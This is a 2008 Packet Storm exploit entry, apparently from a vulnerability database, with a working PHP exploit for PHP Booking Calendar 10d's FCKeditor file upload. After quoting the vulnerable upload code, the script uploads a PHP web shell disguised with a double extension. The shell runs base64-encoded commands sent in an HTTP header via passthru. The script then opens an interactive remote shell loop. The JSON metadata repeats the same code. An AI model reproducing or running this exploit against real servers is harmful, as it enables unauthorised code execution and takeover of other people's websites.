ID PACKETSTORM:66829
Type packetstorm
Reporter Stack
Modified 2008-05-30T00:00:00
Description
`<?php
/*
--------------------------------------------------------------
PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
`
{"type": "packetstorm", "published": "2008-05-30T00:00:00", "reporter": "Stack", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "f2efb8cbec1da0ec67f15e4e46c9123d"}, {"key": "modified", "hash": "6c788948a093c26e5a8169c0829adc3d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6c788948a093c26e5a8169c0829adc3d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2187e1021a911b3807cc1bea2eb1a9ca"}, {"key": "sourceData", "hash": "529ab8e24613659e91806e00b8adc36a"}, {"key": "sourceHref", "hash": "85610c07c459bb47eeea471739bd0a55"}, {"key": "title", "hash": "f34e982efa1002d23bebefb75718dde4"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`<?php \n/* \n-------------------------------------------------------------- \nPHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit \n-------------------------------------------------------------- \n \nSpecial thnx for : Egix \n[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php \n \n41. // Get the posted file. \n42. $oFile = $_FILES['NewFile'] ; \n43. \n44. // Get the uploaded file name and extension. \n45. $sFileName = $oFile['name'] ; \n46. $sOriginalFileName = $sFileName ; \n47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ; \n48. $sExtension = strtolower( $sExtension ) ; \n49. \n50. // The the file type (from the QueryString, by default 'File'). \n51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ; \n52. \n53. // Check if it is an allowed type. \n54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) ) \n55. SendResults( 1, '', '', 'Invalid type specified' ) ; \n56. \n57. // Get the allowed and denied extensions arrays. \n58. $arAllowed = $Config['AllowedExtensions'][$sType] ; \n59. $arDenied = $Config['DeniedExtensions'][$sType] ; \n60. \n61. // Check if it is an allowed extension. \n62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) \n63. SendResults( '202' ) ; \n64. \n65. $sErrorNumber = '0' ; \n66. $sFileUrl = '' ; \n67. \n68. // Initializes the counter used to rename the file, if another one with the same name already exists. \n69. $iCounter = 0 ; \n70. \n71. // The the target directory. \n72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) \n73. $sServerDir = $Config['UserFilesAbsolutePath'] ; \n74. else \n75. //$sServerDir = GetRootPath() . $Config[\"UserFilesPath\"] ; \n76. $sServerDir = $Config[\"UserFilesPath\"] ; \n77. \n78. while ( true ) \n79. { \n80. // Compose the file path. \n81. $sFilePath = $sServerDir . $sFileName ; \n82. \n83. // If a file with that name already exists. \n84. if ( is_file( $sFilePath ) ) \n85. { \n86. $iCounter++ ; \n87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; \n88. $sErrorNumber = '201' ; \n89. } \n90. else \n91. { \n92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; \n93. \n94. if ( is_file( $sFilePath ) ) \n95. { \n96. $oldumask = umask(0) ; \n97. chmod( $sFilePath, 0777 ) ; \n98. umask( $oldumask ) ; \n99. } \n100. \n101. $sFileUrl = $Config[\"UserFilesPath\"] . $sFileName ; \n102. \n103. break ; \n \nwith a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code \n*/ \nerror_reporting(0); \nset_time_limit(0); \nini_set(\"default_socket_timeout\", 5); \nfunction http_send($host, $packet) \n{ \n$sock = fsockopen($host, 80); \nwhile (!$sock) \n{ \nprint \"\\n[-] No response from {$host}:80 Trying again...\"; \n$sock = fsockopen($host, 80); \n} \nfputs($sock, $packet); \nwhile (!feof($sock)) $resp .= fread($sock, 1024); \nfclose($sock); \nreturn $resp; \n} \nprint \"\\n+------------------------------------------------------------+\"; \nprint \"\\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |\"; \nprint \"\\n+------------------------------------------------------------+\\n\"; \nif ($argc < 2) \n{ \nprint \"\\nUsage......: php $argv[0] host path\"; \nprint \"\\nExample....: php $argv[0] localhost /booking_calendar/\\n\"; \ndie(); \n} \n$host = $argv[1]; \n$path = $argv[2]; \n$data = \"--12345\\r\\n\"; \n$data .= \"Content-Disposition: form-data; name=\\\"NewFile\\\"; filename=\\\"s.php.he.ll\\\"\\r\\n\"; \n$data .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\"; \n$data .= \"<?php \\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${print(_code_)} ?>\\n\"; \n$data .= \"--12345--\\r\\n\"; \n$packet = \"POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\\r\\n\"; \n$packet .= \"Host: {$host}\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($data).\"\\r\\n\"; \n$packet .= \"Content-Type: multipart/form-data; boundary=12345\\r\\n\"; \n$packet .= \"Connection: close\\r\\n\\r\\n\"; \n$packet .= $data; \npreg_match(\"/OnUploadCompleted\\((.*),\\\"(.*)\\\",\\\"(.*)\\\",/i\", http_send($host, $packet), $html); \nif (!in_array(intval($html[1]), array(0, 201))) die(\"\\n[-] Upload failed! (Error {$html[1]})\\n\"); \nelse print \"\\n[-] Shell uploaded to {$html[2]}...starting it!\\n\"; \ndefine(STDIN, fopen(\"php://stdin\", \"r\")); \nwhile(1) \n{ \nprint \"\\nstack-shell# \"; \n$cmd = trim(fgets(STDIN)); \nif ($cmd != \"exit\") \n{ \n$packet = \"GET {$path}datacenter/media/{$html[3]} HTTP/1.0\\r\\n\"; \n$packet.= \"Host: {$host}\\r\\n\"; \n$packet.= \"Cmd: \".base64_encode($cmd).\"\\r\\n\"; \n$packet.= \"Connection: close\\r\\n\\r\\n\"; \n$output = http_send($host, $packet); \nif (eregi(\"print\", $output) || !eregi(\"_code_\", $output)) die(\"\\n[-] Exploit failed...\\n\"); \n$shell = explode(\"_code_\", $output); \nprint \"\\n{$shell[1]}\"; \n} \nelse break; \n} \n?> \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:24:48", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/66829/phpbook-upload.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/66829/phpbook-upload.txt", "title": "phpbook-upload.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:66829", "hash": "de7d2b9598685a3a1c567d541110e8d56d782736410d0090f30889c83e94b0d2", "edition": 1, "cvelist": [], "modified": "2008-05-30T00:00:00", "description": ""}
{}
